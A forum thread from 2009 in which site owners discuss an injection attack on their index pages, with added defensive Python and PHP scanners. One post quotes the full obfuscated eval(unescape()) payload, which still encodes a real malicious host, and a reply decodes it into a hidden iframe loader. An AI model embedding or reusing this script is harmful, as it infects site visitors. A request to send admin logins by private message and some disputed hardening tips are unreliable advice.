my site hacked



shimi
05-17-2009, 05:06 AM
I see in all my sites that had the problem (that were hacked) that all the index.php or index.htm files had phishing code added, which produces a warning in Google Chrome. Were your sites also hacked?
Check your site by surfing to it with Google Chrome.

D0gSoldi3r
05-17-2009, 01:27 PM
Forget about Chrome for a second. What is your site, how do you know it's been hacked, and are you using any application for your PHP pages (WordPress, Joomla, etc.)? Give us a link and we'll judge if you've been hacked or not.

oggg
05-22-2009, 03:04 PM
My site was also hacked (again). It is actually the third time it happens. Someone, or a robot (most likely a robot), is adding malicious code to all my index pages. The code is the following:

<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%61%34%36%39%31%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%7a%63%74%6b%2e%72%75%2f%6c%69%77%65%2f%3f%74%3d%31%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%33%31%38%39%38%29%2b%27%32%36%31%61%39%64%38%5c%27%20%77%69%64%74%68%3d%32%36%37%20%68%65%69%67%68%74%3d%34%39%34%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>

I use Joomla, Gallery, and phpgedview. All of them are running the latest version. All of them are being hacked.

Any help would be greatly appreciated!

shadmego
05-22-2009, 03:42 PM
> My site was also hacked (again). It is actually the third time it happens. Someone, or a robot (most likely a robot), is adding malicious code to all my index pages. The code is the following:
>
> <script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%61%34%36%39%31%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%7a%63%74%6b%2e%72%75%2f%6c%69%77%65%2f%3f%74%3d%31%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%33%31%38%39%38%29%2b%27%32%36%31%61%39%64%38%5c%27%20%77%69%64%74%68%3d%32%36%37%20%68%65%69%67%68%74%3d%34%39%34%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>
>
> I use Joomla, Gallery, and phpgedview. All of them are running the latest version. All of them are being hacked.
>
> Any help would be greatly appreciated!

website: *** removed link to hacked site ***

The above code, decoded, is this:

window.status='Done';document.write('<iframe name=a4691 src=\'http://***malicious site removed***/liwe/?t=1?'+Math.round(Math.random()*131898)+'261a9d8\' width=267 height=494 style=\'display: none\'></iframe>')

If you are indeed running the latest version of Joomla!, then I highly doubt Joomla! is the problem here. Your other components, Gallery and phpgedview are the places I would start looking for weak scripting. And of the two, phpgedview would be the suspicious one for me because Gallery is a component that seems to be popular enough, and is updated regularly enough that it would not be first on my list of culprits.

In fact, my very first recommendation to you would be to change both your admin username and password. I manage a site that kept getting hacked. It runs on the older version of Joomla! (1.0.15) and was getting code inserted every hour or so. After some looking around, the problem was that the owner of the site was using the default admin username along with a very, VERY weak password. I told him to change both the username and the password, making the password a combination of upper and lower case letters and numbers. It would not hurt to add some special characters in there either.

After you do that, continue to monitor your site and see if the code keeps reappearing.

For future reference, please do not post active links to sites that contain malicious code. I don't want our users unknowingly clicking a link they will regret.

~regards


P.S. By the way, do you know how to get rid of the code? I can help you if you need the help, but you will need to pm me login information for your admin site.

~regards, again
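
The decoded line above is what the browser actually runs: a hidden iframe pointing at the attacker's host. The decoding can be scripted so that every infected page is checked and cleaned the same way instead of by hand. The following is an added example and is not code from this thread or from Joomla!, Gallery or PhpGedView. It relies on the fact that the browser's `unescape()` is plain percent-decoding, which `urllib.parse.unquote` reproduces. The sample page and the placeholder domain `malicious.example` are constructed for the demonstration; they are not the domain in the posted script.

```python
"""Decode and strip the eval(unescape("...")) injection discussed in the thread.

Added example, not code from the thread. unescape() in the browser is plain
percent-decoding, so urllib.parse.unquote reproduces it exactly.
"""
import re
from urllib.parse import quote, unquote, urlparse

# Matches <script>eval(unescape("%77%69..."));</script>, tolerating whitespace
# and a missing semicolon.
INJECTION_RE = re.compile(
    r'<script>\s*eval\(unescape\("([^"]*)"\)\);?\s*</script>', re.IGNORECASE
)
# Pulls the target URL out of document.write('<iframe ... src=\'http://...\' ...')
IFRAME_SRC_RE = re.compile(r"src=\\?['\"]?(https?://[^'\"\\\s>]+)")


def decode_payload(encoded):
    """Percent-decode the string handed to unescape()."""
    return unquote(encoded)


def analyze(html):
    """One record per injected script: decoded source, iframe target, hidden flag."""
    findings = []
    for match in INJECTION_RE.finditer(html):
        decoded = decode_payload(match.group(1))
        src = IFRAME_SRC_RE.search(decoded)
        findings.append({
            "decoded": decoded,
            "iframe_src": src.group(1) if src else None,
            "iframe_host": urlparse(src.group(1)).hostname if src else None,
            # the posted script sizes the iframe but hides it with display:none
            "hidden": re.search(r"display:\s*none", decoded) is not None,
        })
    return findings


def strip_injection(html):
    """Remove every injected script block; returns (clean_html, blocks_removed)."""
    return INJECTION_RE.subn("", html)


# --- constructed specimen ----------------------------------------------------
# Same shape as the script posted above, but pointing at a placeholder domain.
# It is percent-encoded with quote() here only so the sample stays readable.
_PAYLOAD = (
    "window.status='Done';document.write('<iframe name=a4691 "
    "src=\\'http://malicious.example/liwe/?t=1\\' width=267 height=494 "
    "style=\\'display: none\\'></iframe>')"
)
SAMPLE_PAGE = (
    "<html><head><title>home</title></head><body>\n<p>Welcome</p>\n"
    '<script>eval(unescape("' + quote(_PAYLOAD, safe="") + '")); </script>'
    "</body></html>"
)

if __name__ == "__main__":
    for f in analyze(SAMPLE_PAGE):
        print("iframe ->", f["iframe_src"], "(hidden)" if f["hidden"] else "")
        print("decoded:", f["decoded"])
    clean, removed = strip_injection(SAMPLE_PAGE)
    print(f"removed {removed} injected block(s); clean page:\n{clean}")
```

Run `analyze()` on each index file before `strip_injection()`: the iframe host tells you what to block at the proxy or in the browser warning lists, and a file where `analyze()` finds nothing but the Chrome warning persists means the injection has a different shape than the regex expects and needs to be looked at by hand.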

KevCo
05-23-2009, 05:12 AM
> In fact, my very first recommendation to you would be to change both your admin username and password.
Shad,
If you remember, this was happening to me quite a bit, until I changed my password per your advice. It has not happened since.
What I would like to know, other than replacing or editing the affected files, is there another way to get rid of the code for future reference?

shadmego
05-23-2009, 09:52 AM
If I recall, you are not running a Joomla! installation. In your case, you would log into your cPanel and use your File Manager to locate the affected file. Open said file for editing and remove any code that should not be there.

In the case of a Joomla! installation, you should log into the administrative back end and navigate to Extensions -> Template Manager. Put a mark in the radio button next to the active (default) template name and then click the Edit button (near top right of page). Then click on Edit HTML. This loads the main index.php file into an editable window. Here you should remove the malicious code, saving your changes when finished.

Kev, I'm glad to hear the password change solved your problem. I was wondering about the status of the change.

~regards

KevCo
05-23-2009, 10:18 AM
> If I recall, you are not running a Joomla! installation. In your case, you would log into your cPanel and use your File Manager to locate the affected file. Open said file for editing and remove any code that should not be there.
>
> In the case of a Joomla! installation, you should log into the administrative back end and navigate to Extensions -> Template Manager. Put a mark in the radio button next to the active (default) template name and then click the Edit button (near top right of page). Then click on Edit HTML. This loads the main index.php file into an editable window. Here you should remove the malicious code, saving your changes when finished.
>
> Kev, I'm glad to hear the password change solved your problem. I was wondering about the status of the change.
>
> ~regards
You are correct that I am not running a Joomla installation.
Also, if the problem arises again in the future, I always have backups ready to go now. No more editing all my index files. :D

oggg
05-25-2009, 09:03 PM
Thanks for your reply, I will try to change my password (even though my password is a very good one, with upper and lower cases, numbers and special characters).

I am able to remove the code easily; the problem is that the code is inserted into all index files, which can turn out to be very time consuming.

shadmego
05-25-2009, 09:23 PM
> Thanks for your reply, I will try to change my password (even though my password is a very good one, with upper and lower cases, numbers and special characters).
>
> I am able to remove the code easily; the problem is that the code is inserted into all index files, which can turn out to be very time consuming.

Joomla! only uses one index file (the template index file). If the code for the index file is changed, those changes will be seen on every page Joomla! loads. If you are finding this malicious code in other content items inside Joomla!, then the code is being inserted into the database, in which case your problem is not a weak password but a security flaw in either Joomla! (doubtful) and/or one of your addon components.

If you are talking about all your index files throughout your entire site, even those pages outside of the Joomla! framework, then you should change your cPanel password.

As always, this is a good first place to start, but might not fix the problem completely.

~regards

MindHunter
05-25-2009, 11:50 PM
There is a virus in your computer, that automatically connects to your hosting and adds those links in all your index files. You should get rid of the virus from your computer first, and then change the password for your hosting.
Good Luck.

KevCo
05-26-2009, 02:58 AM
> There is a virus in your computer, that automatically connects to your hosting and adds those links in all your index files. You should get rid of the virus from your computer first, and then change the password for your hosting.
> Good Luck.
MindHunter,
I find this very interesting because it's the first time I have ever heard of such a thing. Does this really happen? What virus causes that? I would like to know more about this if possible.

pghcollectibles
05-26-2009, 11:45 AM
Of course it's possible, but highly unlikely. The same way you complete a series of mouse clicks and keystrokes, the computer can "simulate" them upon a given event (time, keypress, application events, etc.). For that matter, if you are on broadband and always have a connection, it could do it at any time without even "opening" a browser window.

That is what firewalls are for. You should have one on your computer that needs your permission to allow both incoming requests and outgoing requests. For better security, make it always ask; then it can't execute and run through a program you've already given permission to, like a "virus" that would get a password, or just spam and open your mailer (mail is one of the biggest ones you should not let run whenever it wants) and poof.

I've heard a tip for spam viruses:
create a user named aaa@aaa.aaa or something like that. When the virus opens your phone book to send, you will know something happened because you will end up getting an error back.

navsguardar
05-26-2009, 05:18 PM
> MindHunter,
> I find this very interesting because it's the first time I have ever heard of such a thing. Does this really happen? What virus causes that? I would like to know more about this if possible.

Yes, this is a very common type of attack. It's just that the FTP usernames & passwords are searched for & transmitted to a central server. Search Google & you will find loads of information on index file hacks. One very effective suggestion: chmod 444 all your index files. Scan your PC & change FTP passwords.

pghcollectibles
05-26-2009, 05:38 PM
A PHP file is an application. It will need execute rights.

navsguardar
05-26-2009, 05:44 PM
> A PHP file is an application. It will need execute rights.

Don't worry about that. It works & has worked for hundreds of people affected by index injection across hosts & CMSs, including for me :-). So chmod 444 :)

KevCo
05-26-2009, 06:05 PM
> Yes, this is a very common type of attack. It's just that the FTP usernames & passwords are searched for & transmitted to a central server. Search Google & you will find loads of information on index file hacks. One very effective suggestion: chmod 444 all your index files. Scan your PC & change FTP passwords.
Thanks for the info!

r2b2
05-26-2009, 07:42 PM
PHP is an application so a PHP executable would need execute. However when it comes to PHP actually parsing PHP files, it only needs read.

D0gSoldi3r
05-26-2009, 10:07 PM
If shadmego is right then he's obviously brute-force attacking your site. I wouldn't even give him the option to go to www.mysite.com/administrator to try and guess my password; what I would do is go here

http://extensions.joomla.org/extensions/access-&-security/site-security/5809/details

It works for both versions of Joomla; you can change the URL into anything you want, meaning he'll never see your login panel again.

dgitts
07-16-2009, 01:16 PM
I had to deal with this crap for about 2 months on a corporate server housing multiple websites and finally figured out what it was. You and your sites have been exposed to an exploit called Gumblar.
Infected web pages will contain the script like you pasted above and will vary slightly from page to page.
How it got in was my concern, rather than what it did to users who visited my pages, and I figured out that if a user who has FTP access to your web server gets infected from somewhere else, a malicious trojan steals the FTP credentials saved on their computer and uses them to get into the FTP sites. So that's how they got in.
To clean up -> change all FTP passwords and smoke out the culprit by handing over FTP credentials one at a time and watching your server for some time, check the logs (if they have not been deleted yet) and then clean up your files.
Cleaning files -> look for the malicious code right before the <body> tag in your html/htm files. Look for the code (usually encoded in base64) in your PHP files. Also look in your .js files, usually at the very bottom, to see if they are infected. And finally, look through your images folder for a file named image.php.jpg. Also check your .htaccess files for altered permissions.
Backup your web pages so in the event of an attack you will have files to restore as the clean up process can be time consuming when you are looking at over 4000 web pages....
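
The file-by-file sweep described in the post (a script block right before <body> in HTML, base64 blobs fed to eval() in PHP, a payload appended to the bottom of .js files, image.php.jpg in the images folder, .htaccess files to review) can be run over the whole web root in one pass. What follows is an added example, not the poster's own tool: the indicator patterns are my approximations of the locations named in the post, the fixture web root is constructed for the demonstration, and the `RewriteEngine On` line in the sample .htaccess is filler rather than anything from the thread.

```python
"""Sweep a web root for the indicators listed in the clean-up post.

Added example, not the poster's tool. The patterns approximate the locations
named in the post; widen or tighten them to what you actually find.
"""
import os
import re
import stat
import tempfile

# (label, file extensions to look in, pattern)
CONTENT_CHECKS = [
    ("eval(unescape()) script", (".htm", ".html", ".php"),
     re.compile(r"eval\s*\(\s*unescape\s*\(", re.I)),
    ("script block immediately before <body>", (".htm", ".html"),
     re.compile(r"</script>\s*<body\b", re.I)),
    ("eval() of a base64/compressed blob in PHP", (".php",),
     re.compile(r"eval\s*\(\s*(base64_decode|gzinflate|gzuncompress)\s*\(", re.I)),
]
JS_TAIL_BYTES = 512  # an appended payload sits at the very end of the .js file
JS_TAIL_RE = re.compile(r"(eval|document\.write)\s*\(\s*unescape\s*\(", re.I)
DOUBLE_EXT_RE = re.compile(r"\.php\.[a-z0-9]{2,4}$", re.I)  # image.php.jpg and friends


def sweep(root):
    """Return sorted (relative path, indicator) pairs for manual review."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        # do not follow symlinked directories out of the web root
        dirnames[:] = [d for d in dirnames if not os.path.islink(os.path.join(dirpath, d))]
        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            ext = os.path.splitext(name)[1].lower()
            if name == ".htaccess":
                mode = stat.S_IMODE(os.stat(path).st_mode)
                hits.append((rel, ".htaccess present (mode %04o): review its rules" % mode))
            if DOUBLE_EXT_RE.search(name):
                hits.append((rel, "PHP file hidden behind a second extension"))
            try:
                with open(path, "rb") as fh:
                    text = fh.read().decode("utf-8", "replace")
            except OSError:
                continue
            for label, exts, pattern in CONTENT_CHECKS:
                if ext in exts and pattern.search(text):
                    hits.append((rel, label))
            if ext == ".js" and JS_TAIL_RE.search(text[-JS_TAIL_BYTES:]):
                hits.append((rel, "unescape() payload appended to the end of a .js file"))
    return sorted(hits)


def build_sample_root():
    """Constructed fixture: a tiny web root with one of each indicator plus clean files."""
    root = tempfile.mkdtemp(prefix="webroot-")
    files = {
        "index.html": '<html><head></head><script>eval(unescape("%77"));</script>'
                      "<body>home</body></html>",
        "about.html": "<html><head></head><body>clean page</body></html>",
        "inc/config.php": "<?php\n$db = 'site';\neval(base64_decode('aGVsbG8='));\n",
        "js/menu.js": "function menu() {}\n" * 40 + 'document.write(unescape("%3C"));\n',
        "images/image.php.jpg": "<?php /* not an image */ ?>",
        "images/.htaccess": "RewriteEngine On\n",  # filler content, not from the post
    }
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
    os.chmod(os.path.join(root, "images", ".htaccess"), 0o644)
    return root


if __name__ == "__main__":
    for rel, label in sweep(build_sample_root()):
        print(f"{rel}: {label}")
```

Treat the output as a review list, not a verdict: a legitimate template can carry a script before <body>, and a minified library can end in `eval(`, so each hit is compared against the clean backup before anything is deleted.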

pghcollectibles
07-16-2009, 11:30 PM
This is code someone gave me (I can't remember who, or I would give credit) that scans your files for files that have been modified in the last "n" days:


<?php
//-----------------------------------------------------------------------------
// Lists every file under $start_folder modified within the last N days.
// The script has no login of its own: upload it, run it, then delete it,
// because left in place it lets anyone who finds it browse your file tree.
//-----------------------------------------------------------------------------
$start_folder = "/home/username/"; //put your cpanel username here
$Days = (isset($_POST["days"]) && (int) $_POST["days"] > 0) ? (int) $_POST["days"] : 2;
//-----------------------------------------------------------------------------
$middle = choose($Days);
if(isset($_POST["submit"]))
{
    $requested = isset($_POST["folder"]) ? trim($_POST["folder"], "/") : "";
    // realpath() resolves any "../" in the request; the prefix test then
    // refuses anything that resolves to a path outside $start_folder
    $folder = realpath($start_folder.$requested);
    $base   = realpath($start_folder);
    if($folder !== false && $base !== false && strpos($folder."/", $base."/") === 0)
    {
        $Test = date("Y-m-d H:i", time() - ($Days * 86400)); // cut-off time
        $files = find_files($folder, $Test);
        $middle.= show_files($files);
    }
    else $middle.= "<div class='error_div'>folder: <b>".htmlspecialchars($requested)."</b> - does not exist!</div>";
}
//-----------------------------------------------------------------------------
$start = html_start($middle);
$end = html_end();
print $start.$end;
//-----------------------------------------------------------------------------

//-----------------------------------------------------------------------------
function choose($Days)
{
    global $start_folder;

    // echo the previous input back escaped, so it cannot inject markup
    $folder = isset($_POST["folder"]) ? htmlspecialchars($_POST["folder"]) : "";

    $v = "<table class='choose_table'>";

    $v.= "<tr>";
    $v.= "<td colspan='3' class='choose_header_td'><h3>Find recently modified files</h3></td>";
    $v.= "</tr>";

    $v.= "<tr>";
    $v.= "<td colspan='3'>&nbsp;</td>";
    $v.= "</tr>";

    $v.= "<tr>";
    $v.= "<td class='choose_name_td'>look in <b>".htmlspecialchars($start_folder)."</b></td>";
    $v.= "<td class='choose_input_td'><input type='text' name='folder' value='$folder' class='choose_input'></td>";
    $v.= "<td class='choose_last_td'>/</td>";
    $v.= "</tr>";

    $v.= "<tr>";
    $v.= "<td class='choose_name_td'>list files modified within last</td>";
    $v.= "<td class='choose_input_td'><input type='text' name='days' value='$Days' class='choose_input'></td>";
    $v.= "<td class='choose_last_td'>days</td>";
    $v.= "</tr>";

    $v.= "<tr>";
    $v.= "<td class='choose_name_td'></td>";
    $v.= "<td colspan='2' class='choose_submit_td'><input type='submit' name='submit' value='start search'></td>";
    $v.= "</tr>";

    $v.= "</table>";

    return $v;
}
//-----------------------------------------------------------------------------
function find_files($Folder, $Test)
{
    global $start_folder;

    $v = array();

    $dir = @scandir($Folder);
    if($dir === false) return $v; // unreadable directory: nothing to list

    foreach($dir as $file) {
        if($file=="." || $file=="..") continue;
        $current = rtrim($Folder, "/")."/".$file;

        // symlinks could lead outside the tree (or loop); do not follow them
        if(is_link($current)) continue;

        if(is_dir($current))
        {
            $v = array_merge($v, find_files($current, $Test));
            continue;
        }

        $stat = @stat($current);
        if($stat === false) continue;
        $mtime = date("Y-m-d H:i", $stat["mtime"]);
        $ctime = date("Y-m-d H:i", $stat["ctime"]); // inode change time, not creation

        // keep only files whose modification time is newer than the cut-off
        if(strcmp($Test, $mtime) >= 0) continue;

        $v[$current] = array(
            "File"     => $file,
            "Location" => substr($current, strlen($start_folder)),
            "Ctime"    => $ctime,
            "Mtime"    => $mtime,
        );
    }

    return $v;
}
//-----------------------------------------------------------------------------
function show_files($Files)
{
    global $numfiles;
    $numfiles = 0;
    $trs = "";
    $par = false;
    ksort($Files);
    foreach($Files as $path => $data)
    {
        $sufix = ($par = !$par) ? "_par": ""; // alternate row shading

        $tds = "<td class='list_file_td'>".htmlspecialchars($data["File"])."</td>";
        $tds.= "<td class='list_location_td'>".htmlspecialchars($data["Location"])."</td>";
        $tds.= "<td class='list_time_td'>".$data["Mtime"]."</td>";
        $tds.= "<td class='list_time_td'>".$data["Ctime"]."</td>";

        $trs.= "<tr class='list_tr$sufix'>$tds</tr>";
        $numfiles++;
    }

    $header = "<tr>";
    $header.= "<td class='list_header_td'>file</td>";
    $header.= "<td class='list_header_td'>location</td>";
    $header.= "<td class='list_header_td'>modified (mtime)</td>";
    // ctime is when the inode last changed (content, owner or mode), not when
    // the file was created; unlike mtime it cannot be set back with touch
    $header.= "<td class='list_header_td'>changed (ctime)</td>";
    $header.= "</tr>";

    $v = "<table class='list_table'>";
    $v.= $header;
    $v.= $trs;
    $v.= "</table>";
    $v.= "<p>$numfiles file(s) modified since the cut-off</p>";

    return $v;
}
//-----------------------------------------------------------------------------
function html_start($middle)
{
    $v = "<html><head><style>table{width:100%;border-collapse:collapse;}
.main_td{width:1000px;}
.error_div{border:2px solid #770000;background:#ddcc33;padding:20px;width:80%; color:#770000;}
.choose_table{margin-top:20px;margin-bottom:20px;border:1px solid #777777;background:#fafafa;}
.choose_name_td{text-align:right;padding:3px;padding-right:10px;width:30%;}
.choose_input_td{width:1px;}
.choose_input{width:97%;border:1px solid #777777;padding-top:3px;padding-bottom:3px;padding-left:5px;color:#555555;font-weight:bold;}
.choose_submit_td{padding:5px;padding-left:0px;}
.choose_last_td{padding:3px;padding-left:10px;width:30%;}
.choose_header_td{padding:5px;text-align:center;font-weight:bold;border-bottom:2px solid orange;}
.list_table{border:1px solid #777777;background:#f9f9f9;margin-bottom:20px;}
.list_file_td{font-weight:bold;padding:3px;padding-left:10px;}
.list_location_td{padding:3px;padding-left:10px;}
.list_time_td{padding:3px;padding-left: 10px;}
.list_header_td{padding:5px;padding-left: 10px;font-weight: bold;border-bottom:2px solid orange;}
.list_tr_par{background:white;}
.list_tr:hover{background:#ffcc33;}
.list_tr_par:hover{background:#ffcc33;}</style></head><body>
";
    $v.= "<form name='forma' method='POST' action=''>";
    $v.= "<table>";
    $v.= "<tr>";
    $v.= "<td></td>";
    $v.= "<td class='main_td'>$middle</td>";
    $v.= "<td></td>";
    $v.= "</tr>";
    $v.= "</table>";
    return $v;
}
//-----------------------------------------------------------------------------
function html_end()
{
    $v = "</form>";
    $v.= "</body></html>";
    return $v;
}
//-----------------------------------------------------------------------------
?>
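
The scanner above filters on mtime, and the caveat worth knowing is that whoever holds the FTP credentials can put a file's old timestamp back after editing it (touch -r on a shell, or the MFMT command on FTP servers that support it), so the edited file never shows up in a recently-modified list. Comparing file hashes against a manifest taken from a known-clean state (the backup KevCo keeps ready) catches the edit regardless of timestamps. This is an added example, not code from the thread; the fixture site and the backdated injection are constructed for the demonstration, and the manifest location is an assumption.

```python
"""Hash-manifest integrity check for a web root.

Added example, not code from the thread. A mtime scan can be defeated by
anyone who can reset timestamps; comparing SHA-256 hashes against a manifest
taken from a known-clean copy cannot.
"""
import hashlib
import json
import os
import tempfile
import time


def sha256_of(path):
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root):
    """Map relative path -> SHA-256 for every regular file under root."""
    manifest = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if not os.path.islink(os.path.join(dirpath, d))]
        for name in filenames:
            path = os.path.join(dirpath, name)
            if not os.path.islink(path):
                manifest[os.path.relpath(path, root)] = sha256_of(path)
    return manifest


def save_manifest(manifest, path):
    # keep the manifest OUTSIDE the web root and out of the FTP account's reach,
    # otherwise the same stolen credentials can rewrite it
    with open(path, "w") as fh:
        json.dump(manifest, fh, indent=1, sort_keys=True)


def load_manifest(path):
    with open(path) as fh:
        return json.load(fh)


def compare(baseline, root):
    """Files added, removed or changed relative to the baseline manifest."""
    current = build_manifest(root)
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
    }


def modified_since(root, cutoff):
    """What a mtime-only scan reports: files whose mtime is newer than cutoff."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            if os.stat(path).st_mtime > cutoff:
                hits.append(os.path.relpath(path, root))
    return sorted(hits)


def demo():
    """Constructed fixture: clean site, baseline, then a backdated injection."""
    root = tempfile.mkdtemp(prefix="site-")
    os.makedirs(os.path.join(root, "gallery"))
    for rel, body in {"index.php": "<?php echo 'home'; ?>\n",
                      "gallery/index.php": "<?php echo 'gallery'; ?>\n"}.items():
        with open(os.path.join(root, rel), "w") as fh:
            fh.write(body)
    manifest_path = os.path.join(tempfile.mkdtemp(prefix="manifest-"), "site.json")
    save_manifest(build_manifest(root), manifest_path)
    cutoff = time.time()

    # The attacker appends the script to index.php, then restores the old
    # modification time so a "changed in the last N days" scan misses it.
    target = os.path.join(root, "index.php")
    before = os.stat(target)
    with open(target, "a") as fh:
        fh.write('<script>eval(unescape("%77%69%6e%64%6f%77"));</script>\n')
    os.utime(target, ns=(before.st_atime_ns, before.st_mtime_ns))

    return {
        "mtime_scan": modified_since(root, cutoff),
        "hash_scan": compare(load_manifest(manifest_path), root),
    }


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

The manifest is only as good as the copy it was taken from, so build it from the cleaned backup, not from the live site. The ctime column the PHP scanner prints is the complementary check: the kernel updates ctime on every write or metadata change and an unprivileged user cannot rewind it, so a file whose ctime is newer than its mtime has had its timestamp tampered with.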